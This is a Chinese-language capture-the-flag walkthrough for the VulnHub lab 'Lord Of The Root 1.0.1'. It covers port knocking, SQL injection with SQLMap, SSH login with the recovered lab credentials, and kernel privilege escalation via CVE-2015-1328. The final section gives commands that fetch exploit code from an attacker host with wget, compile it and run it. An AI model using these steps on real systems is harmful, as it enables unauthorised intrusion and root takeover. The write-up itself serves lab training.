VulnHub Lord Of The Root：1.0.1

Lord Of The Root: 1.0.1

项目地址：https://download.vulnhub.com/lordoftheroot/LordOfTheRoot_1.0.1.ova

是一个打包好的镜像文件

注意：导入 vmx 时一定要选择我已移动，否则没网

使用 Nmap 扫描出开放服务及操作系统版本

CTF

Port Knocking

SSH 连接回显，提示 1，2，3

使用 NMap 进行端口敲击

-Pn 作用：跳过主机发现阶段，直接假设目标主机在线

然后发现开启了 1337 端口

打开 1337 端口后，我们通过网页浏览器访问它

/index.php 可以获取到一张新图片，查看源代码后，在注释中发现了一个 base64 哈希值

多次解码后得到 /978345210/index.php，访问是一个登录页面

SQL 注入

Welcome to the Gates of Mordor（两个）

使用 SQLMap 可以直接跑出来

用户名：smeagol
密码：MyPreciousR00t

弱口令

SSH

通过上面 SQL 注入跑出来的账号直接登录

提权

内核 overlayfs 文件系统（CVE-2015-1328）

查看系统版本

cd /tmp
wget http://192.168.1.9:4444/39166.c
gcc -o overlayfs 39166.c
./overlayfs

提权成功